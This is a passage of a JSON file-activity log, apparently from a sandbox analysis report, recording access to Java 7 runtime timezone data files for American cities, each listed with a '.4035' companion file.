(x86)\\java\\jre7\\lib\\zi\\america\\atikokan.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Atikokan", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\atikokan", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Bahia.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\bahia.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Bahia", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\bahia", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Bahia_Banderas.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\bahia_banderas.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Bahia_Banderas", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\bahia_banderas", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Barbados.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\barbados.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Barbados", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\barbados", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Belem.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\belem.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Belem", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\belem", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Belize.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\belize.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Belize", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\belize", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Blanc-Sablon.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\blanc-sablon.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Blanc-Sablon", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\blanc-sablon", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Boa_Vista.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\boa_vista.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Boa_Vista", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\boa_vista", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Bogota.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\bogota.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Bogota", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\bogota", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Boise.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\boise.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Boise", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\boise", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Cambridge_Bay.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\cambridge_bay.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Cambridge_Bay", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\cambridge_bay", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Campo_Grande.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\campo_grande.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Campo_Grande", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\campo_grande", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Cancun.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\cancun.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Cancun", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\cancun", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Caracas.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\caracas.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Caracas", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\caracas", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Cayenne.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\cayenne.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Cayenne", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\cayenne", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Cayman.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\cayman.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Cayman", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\cayman", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Chicago.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\chicago.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Chicago", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\chicago", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Chihuahua.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\chihuahua.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Chihuahua", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\chihuahua", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Costa_Rica.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\costa_rica.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Costa_Rica", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\costa_rica", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Creston.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\creston.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Creston", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\creston", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Cuiaba.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\cuiaba.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Cuiaba", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\cuiaba", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Curacao.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\curacao.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Curacao", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\curacao", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Danmarkshavn.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\danmarkshavn.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Danmarkshavn", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\danmarkshavn", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Dawson.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\dawson.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Dawson", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\dawson", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Dawson_Creek.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\dawson_creek.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Dawson_Creek", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\dawson_creek", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Denver.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\denver.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Denver", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\denver", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Detroit.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\detroit.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Detroit", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\detroit", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Edmonton.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\edmonton.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Edmonton", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\edmonton", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Eirunepe.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\eirunepe.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Eirunepe", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\eirunepe", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\El_Salvador.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\el_salvador.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\El_Salvador", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\el_salvador", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Fortaleza.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\fortaleza.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Fortaleza", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\fortaleza", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Glace_Bay.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\glace_bay.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Glace_Bay", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\glace_bay", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Godthab.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\godthab.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Godthab", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\godthab", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Goose_Bay.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\goose_bay.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Goose_Bay", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\goose_bay", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Grand_Turk.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\grand_turk.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Grand_Turk", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\grand_turk", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Guatemala.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\guatemala.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Guatemala", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\guatemala", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Guayaquil.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\guayaquil.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Guayaquil", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\guayaquil", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Guyana.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\guyana.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Guyana", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\guyana", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Halifax.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\halifax.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Halifax", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\halifax", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Havana.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\havana.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Havana", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\havana", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Hermosillo.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\hermosillo.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Hermosillo", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\hermosillo", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Inuvik.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\inuvik.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Inuvik", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\inuvik", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Iqaluit.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\iqaluit.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Iqaluit", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\iqaluit", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Jamaica.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\jamaica.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Jamaica", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\jamaica", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Juneau.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\juneau.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Juneau", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\juneau", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\La_Paz.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\la_paz.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\La_Paz", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\la_paz", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Lima.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\lima.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Lima", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\lima", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Los_Angeles.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\los_angeles.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Los_Angeles", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\los_angeles", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Maceio.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\maceio.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Maceio", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\maceio", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Managua.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\managua.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Managua", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\managua", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Manaus.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\manaus.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Manaus", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\manaus", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Martinique.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\martinique.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Martinique", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\martinique", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Matamoros.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\matamoros.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Matamoros", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\matamoros", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Mazatlan.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\mazatlan.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Mazatlan", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\mazatlan", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Menominee.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\menominee.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Menominee", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\menominee", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Merida.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\merida.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Merida", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\merida", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Metlakatla.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\metlakatla.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Metlakatla", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\metlakatla", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Mexico_City.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\mexico_city.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Mexico_City", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\mexico_city", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Miquelon.4035", "hashes": [], "norm_filename": "c:\\program files 